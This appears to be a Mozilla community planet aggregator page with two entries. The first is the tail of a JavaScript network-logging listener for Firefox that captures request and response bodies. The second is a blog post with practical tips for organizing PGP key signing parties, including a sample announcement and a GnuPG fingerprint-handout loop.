  },

  onDataAvailable: function(aRequest, aContext, aStream, aOffset, aCount) {
    // Copy the response data into a storage stream so the original listener
    // still receives an unread stream while we keep the bytes for ourselves.
    let binaryInputStream = Components.classes["@mozilla.org/binaryinputstream;1"]
                                      .createInstance(Components.interfaces.nsIBinaryInputStream);
    let storageStream = Components.classes["@mozilla.org/storagestream;1"]
                                  .createInstance(Components.interfaces.nsIStorageStream);
    let outStream = Components.classes["@mozilla.org/binaryoutputstream;1"]
                              .createInstance(Components.interfaces.nsIBinaryOutputStream);

    binaryInputStream.setInputStream(aStream);
    storageStream.init(8192, aCount, null);
    outStream.setOutputStream(storageStream.getOutputStream(0));

    let data = binaryInputStream.readBytes(aCount);
    this._chunks.push(data);

    outStream.writeBytes(data, aCount);
    this._next.onDataAvailable(aRequest, aContext,
                               storageStream.newInputStream(0),
                               aOffset, aCount);
  },

  toString: function() {
    let str = this.method + " " + this.uri;
    for (let hdr of Object.keys(this.requestHeaders)) {
      str += hdr + ": " + this.requestHeaders[hdr] + "\n";
    }
    if (this.requestBody) {
      str += "\r\n" + this.requestBody + "\n";
    }
    str += "\n" + this.responseStatus + " " + this.responseStatusText;
    if (this.responseBody) {
      str += "\r\n" + this.responseBody + "\n";
    }
    return str;
  }
};

// Taken from:
// http://hg.mozilla.org/mozilla-central/file/2399d1ae89e9/toolkit/devtools/webconsole/network-helper.js#l120
function readRequestBody(aRequest, aCharset="UTF-8") {
  let text = null;
  if (aRequest instanceof Ci.nsIUploadChannel) {
    let iStream = aRequest.uploadStream;

    let isSeekableStream = false;
    if (iStream instanceof Ci.nsISeekableStream) {
      isSeekableStream = true;
    }

    let prevOffset;
    if (isSeekableStream) {
      prevOffset = iStream.tell();
      iStream.seek(Ci.nsISeekableStream.NS_SEEK_SET, 0);
    }

    // Read data from the stream.
    try {
      let rawtext = NetUtil.readInputStreamToString(iStream, iStream.available());
      let conv = Components.classes["@mozilla.org/intl/scriptableunicodeconverter"]
                           .createInstance(Components.interfaces.nsIScriptableUnicodeConverter);
      conv.charset = aCharset;
      text = conv.ConvertToUnicode(rawtext);
    } catch (err) {
    }

    // Seek locks the file, so seek to the beginning only if necko hasn't
    // read it yet, since necko doesn't seek to 0 before reading (at least
    // not till bug 459384 is fixed).
    if (isSeekableStream && prevOffset == 0) {
      iStream.seek(Components.interfaces.nsISeekableStream.NS_SEEK_SET, 0);
    }
  }
  return text;
}


Categorieën: Mozilla-nl planet

Ludovic Hirlimann: Tips on organizing a pgp key signing party

Thunderbird - ma, 29/09/2014 - 13:03

Over the years I’ve organized or tried to organize pgp key signing parties every time I go somewhere. In the last year I’ve organized 3 that were successful (e.g. with more than 10 attendees).

1. Have a venue

I’ve tried a bunch of times to have people show up in the morning at the hotel I was staying at - that doesn’t work. Having catering at the venue is even better; it will encourage people to come from far away (or commute a long distance). Mark the path inside the venue with signs (paper sheets with "PGP key signing party" and arrows help).

2. Date and time

Meeting in the evening after work works best (starting at 18:00 or 18:30).

Let people know how long it will take (count on 1 hour per 30 participants).

3. Make people sign up

That makes people think twice before saying they will attend. It’s also an easy way for you to know how much beer, cola, etc. you’ll need to provide if you cater food.

I’ve been using eventbrite to manage attendance at my last three meetings; it lets me:

  • know who is coming
  • Mass mail participants
  • have them have a calendar reminder
4. Reach out

For such a party you need people to attend so you need to reach out.

I always start with a search on biglumber.com to find the gpg users registered on that site for the area I’m visiting (see below for what I send).

Then I look for local Linux user groups / *BSD groups and send an announcement to them with:

  • date
  • venue
  • link to eventbrite and why I use it
  • ask them to forward (they know the area better than you)
  • I also use lanyrd and twitter but I’m not convinced that it works.

For my last announcement, it looked like this:

Subject: GnuPG / PGP key signing party September 26 2014
Content-Type: multipart/signed; micalg=pgp-sha256;
 protocol="application/pgp-signature";
 boundary="t01Mpe56TgLc7mgHKVMajjwkqQdw8XvI4"

This is an OpenPGP/MIME signed message (RFC 4880 and 3156)
--t01Mpe56TgLc7mgHKVMajjwkqQdw8XvI4
Content-Type: text/plain; charset=utf-8
Content-Transfer-Encoding: quoted-printable

Hello, my name is ludovic,

I'm a sysadmin at mozilla working remote from europe. I've been involved
with Thunderbird a lot (and still am). I'm organizing a pgp key signing
party in the Mozilla san francisco office on September the 26th 2014 from
6PM to 8PM.

For security and assurance reasons I need to count how many people will
attend. I've set up an eventbrite for that at
https://www.eventbrite.com/e/gnupg-pgp-key-signing-party-making-the-web-of-trust-stronger-tickets-12867542165
(please take one ticket if you think about attending - if you change your
mind, cancel so more people can come).

I will use the eventbrite tool to send reminders and I will try to make a
list with keys and fingerprints before the event to make things more
manageable (but I don't promise).

For those using lanyrd you will be able to use http://lanyrd.com/ccckzw.

Ludovic

ps: sent to buug.org, nblug.org and penlug.org - please feel free to post
where appropriate (the more the merrier, the stronger the web of trust).
ps2: I have contacted people listed on biglumber to have more gpg-related
people show up.

--
[:Usul] MOC Team at Mozilla
QA Lead for Thunderbird
http://sietch-tabr.tumblr.com/ - http://weusepgp.info/

5. Make it easy to attend

As noted above, making a list of participants to hand out helps a lot (I’ve used http://www.phildev.net/pius/ and my own stuff to make a list). It makes things easier for you and for attendees. Tell people what they need to bring (IDs, a pen, and printed fingerprints if you don’t provide a list).
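
If you would rather not depend on pius, a bare-bones version of such a handout can be produced with stock GnuPG; this is only a sketch with a hypothetical input file, not the tooling actually used for these parties:

# attendee-keyids.txt: one key ID or fingerprint per registered attendee
while read -r keyid; do
  gpg --recv-keys "$keyid"       # fetch the key from the configured keyserver
  gpg --fingerprint "$keyid"     # print the user IDs plus the full fingerprint
done < attendee-keyids.txt > handout.txt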

6. Send reminders

Send people reminders and let them know how many people intend to show up. It boosts attendance.

Categorieën: Mozilla-nl planet
